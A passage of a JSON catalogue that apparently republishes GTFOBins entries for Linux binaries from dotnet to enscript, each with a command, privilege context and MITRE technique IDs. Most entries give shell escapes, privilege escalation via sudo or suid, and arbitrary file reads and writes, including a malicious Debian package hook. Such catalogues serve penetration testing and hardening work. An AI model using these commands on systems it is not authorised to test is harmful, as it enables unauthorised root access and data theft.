fsi\nSystem.IO.File.ReadAllText(\"/path/to/input-file\");;","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dotnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dotnet:file-read:0:unprivileged","toolId":"gtfo:dotnet","toolName":"dotnet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dotnet fsi\nSystem.IO.File.ReadAllText(\"/path/to/input-file\");;","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dotnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dotnet:shell:0:sudo","toolId":"gtfo:dotnet","toolName":"dotnet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dotnet fsi\nSystem.Diagnostics.Process.Start(\"/bin/sh\").WaitForExit();;","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dotnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dotnet:shell:0:unprivileged","toolId":"gtfo:dotnet","toolName":"dotnet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dotnet fsi\nSystem.Diagnostics.Process.Start(\"/bin/sh\").WaitForExit();;","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dotnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dpkg:inherit:0:sudo","toolId":"gtfo:dpkg","toolName":"dpkg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dpkg -l","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dpkg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dpkg:inherit:0:suid","toolId":"gtfo:dpkg","toolName":"dpkg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dpkg -l","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dpkg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dpkg:inherit:0:unprivileged","toolId":"gtfo:dpkg","toolName":"dpkg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"dpkg -l","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dpkg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dpkg:shell:0:sudo","toolId":"gtfo:dpkg","toolName":"dpkg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dpkg -i x_1.0_all.deb","description":"Generate the Debian package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho 'exec /bin/sh' >x.sh\nfpm -n x -s dir -t deb -a all --before-install x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dpkg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dstat:inherit:0:sudo","toolId":"gtfo:dstat","toolName":"dstat","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"dstat --xxx","description":"`dstat` allows you to run arbitrary Python scripts loaded as \"external plugins\" if they are located in one of the directories, stated in the `dstat` man page under \"FILES\":\n\n- `~/.dstat/`\n- `(path of binary)/plugins/`\n- `/usr/share/dstat/`\n- `/usr/local/share/dstat/`\n\nPick the one that you can write into. The plugin named `xxx` file name must be defined in the `dstat_xxx.py` file.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dstat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dstat:inherit:0:unprivileged","toolId":"gtfo:dstat","toolName":"dstat","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"dstat --xxx","description":"`dstat` allows you to run arbitrary Python scripts loaded as \"external plugins\" if they are located in one of the directories, stated in the `dstat` man page under \"FILES\":\n\n- `~/.dstat/`\n- `(path of binary)/plugins/`\n- `/usr/share/dstat/`\n- `/usr/local/share/dstat/`\n\nPick the one that you can write into. The plugin named `xxx` file name must be defined in the `dstat_xxx.py` file.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dstat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dvips:shell:0:sudo","toolId":"gtfo:dvips","toolName":"dvips","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dvips -R0 texput.dvi","description":"The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.\n\n```\ntex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dvips/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dvips:shell:0:suid","toolId":"gtfo:dvips","toolName":"dvips","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dvips -R0 texput.dvi","description":"The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.\n\n```\ntex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dvips/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dvips:shell:0:unprivileged","toolId":"gtfo:dvips","toolName":"dvips","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dvips -R0 texput.dvi","description":"The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.\n\n```\ntex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n```","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dvips/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:easy_install:inherit:0:sudo","toolId":"gtfo:easy_install","toolName":"easy_install","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\neasy_install .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/easy_install/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:easy_install:inherit:0:unprivileged","toolId":"gtfo:easy_install","toolName":"easy_install","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\neasy_install .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/easy_install/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:easyrsa:shell:0:sudo","toolId":"gtfo:easyrsa","toolName":"easyrsa","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'set_var X \"$(/bin/sh 1>&0)\"' >/path/to/temp-file\neasyrsa --vars=/path/to/temp-file","description":"This command might not be in the `PATH`, it could be found in, `/usr/share/easy-rsa/easyrsa`. The shell is spawn twice.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/easyrsa/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:easyrsa:shell:0:suid","toolId":"gtfo:easyrsa","toolName":"easyrsa","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'set_var X \"$(/bin/sh 1>&0)\"' >/path/to/temp-file\neasyrsa --vars=/path/to/temp-file","description":"This command might not be in the `PATH`, it could be found in, `/usr/share/easy-rsa/easyrsa`. The shell is spawn twice.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/easyrsa/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:easyrsa:shell:0:unprivileged","toolId":"gtfo:easyrsa","toolName":"easyrsa","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'set_var X \"$(/bin/sh 1>&0)\"' >/path/to/temp-file\neasyrsa --vars=/path/to/temp-file","description":"This command might not be in the `PATH`, it could be found in, `/usr/share/easy-rsa/easyrsa`. The shell is spawn twice.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/easyrsa/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:eb:inherit:0:sudo","toolId":"gtfo:eb","toolName":"eb","name":"inherit ← journalctl","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"eb logs","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/eb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:eb:inherit:0:unprivileged","toolId":"gtfo:eb","toolName":"eb","name":"inherit ← journalctl","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"eb logs","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/eb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ed:file-read:0:sudo","toolId":"gtfo:ed","toolName":"ed","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ed /path/to/input-file\n,p\nq","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:ed:file-read:0:suid","toolId":"gtfo:ed","toolName":"ed","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ed /path/to/input-file\n,p\nq","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:ed:file-read:0:unprivileged","toolId":"gtfo:ed","toolName":"ed","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ed /path/to/input-file\n,p\nq","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:ed:file-write:0:sudo","toolId":"gtfo:ed","toolName":"ed","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ed /path/to/output-file\na\nDATA\n.\nw\nq","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:ed:file-write:0:suid","toolId":"gtfo:ed","toolName":"ed","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ed /path/to/output-file\na\nDATA\n.\nw\nq","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:ed:file-write:0:unprivileged","toolId":"gtfo:ed","toolName":"ed","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ed /path/to/output-file\na\nDATA\n.\nw\nq","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:ed:shell:0:sudo","toolId":"gtfo:ed","toolName":"ed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ed\n!/bin/sh\nq","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:ed:shell:0:suid","toolId":"gtfo:ed","toolName":"ed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ed\n!/bin/sh\nq","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:ed:shell:0:unprivileged","toolId":"gtfo:ed","toolName":"ed","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ed\n!/bin/sh\nq","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ed/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["red"]},{"id":"gtfo:efax:file-read:0:sudo","toolId":"gtfo:efax","toolName":"efax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"efax -d /path/to/input-file","description":"The content is actually parsed by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/efax/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:efax:file-read:0:suid","toolId":"gtfo:efax","toolName":"efax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"efax -d /path/to/input-file","description":"The content is actually parsed by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/efax/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:egrep:file-read:0:sudo","toolId":"gtfo:egrep","toolName":"egrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/egrep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:egrep:file-read:0:suid","toolId":"gtfo:egrep","toolName":"egrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/egrep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:egrep:file-read:0:unprivileged","toolId":"gtfo:egrep","toolName":"egrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/egrep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:file-read:0:sudo","toolId":"gtfo:elvish","toolName":"elvish","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"elvish -c 'print (slurp </path/to/input-file)'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:file-read:0:suid","toolId":"gtfo:elvish","toolName":"elvish","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"elvish -c 'print (slurp </path/to/input-file)'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:file-read:0:unprivileged","toolId":"gtfo:elvish","toolName":"elvish","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"elvish -c 'print (slurp </path/to/input-file)'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:file-write:0:sudo","toolId":"gtfo:elvish","toolName":"elvish","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"elvish -c 'print DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:file-write:0:suid","toolId":"gtfo:elvish","toolName":"elvish","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"elvish -c 'print DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:file-write:0:unprivileged","toolId":"gtfo:elvish","toolName":"elvish","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"elvish -c 'print DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:shell:0:sudo","toolId":"gtfo:elvish","toolName":"elvish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"elvish","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:shell:0:suid","toolId":"gtfo:elvish","toolName":"elvish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"elvish","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:elvish:shell:0:unprivileged","toolId":"gtfo:elvish","toolName":"elvish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"elvish","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/elvish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:emacs:file-read:0:sudo","toolId":"gtfo:emacs","toolName":"emacs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"emacs /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/emacs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:emacs:file-read:0:unprivileged","toolId":"gtfo:emacs","toolName":"emacs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"emacs /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/emacs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:emacs:file-write:0:sudo","toolId":"gtfo:emacs","toolName":"emacs","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"emacs /path/to/output-file\nDATA\nC-x C-s","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/emacs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:emacs:file-write:0:unprivileged","toolId":"gtfo:emacs","toolName":"emacs","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"emacs /path/to/output-file\nDATA\nC-x C-s","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/emacs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:emacs:shell:0:sudo","toolId":"gtfo:emacs","toolName":"emacs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"emacs -Q -nw --eval '(term \"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/emacs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:emacs:shell:0:unprivileged","toolId":"gtfo:emacs","toolName":"emacs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"emacs -Q -nw --eval '(term \"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/emacs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:enscript:shell:0:sudo","toolId":"gtfo:enscript","toolName":"enscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"enscript /dev/null -qo /dev/null -I '/bin/sh >&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/enscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:enscript:shell:0:suid","toolId":"gtfo:enscript","toolName":"enscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"enscript /dev/null -qo /dev/null -I '/bin/sh >&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/enscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:enscript:shell:0:unprivileged","toolId":"gtfo:enscript","toolName":"enscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"enscript /dev/null -qo /dev/null -I '/bin/sh 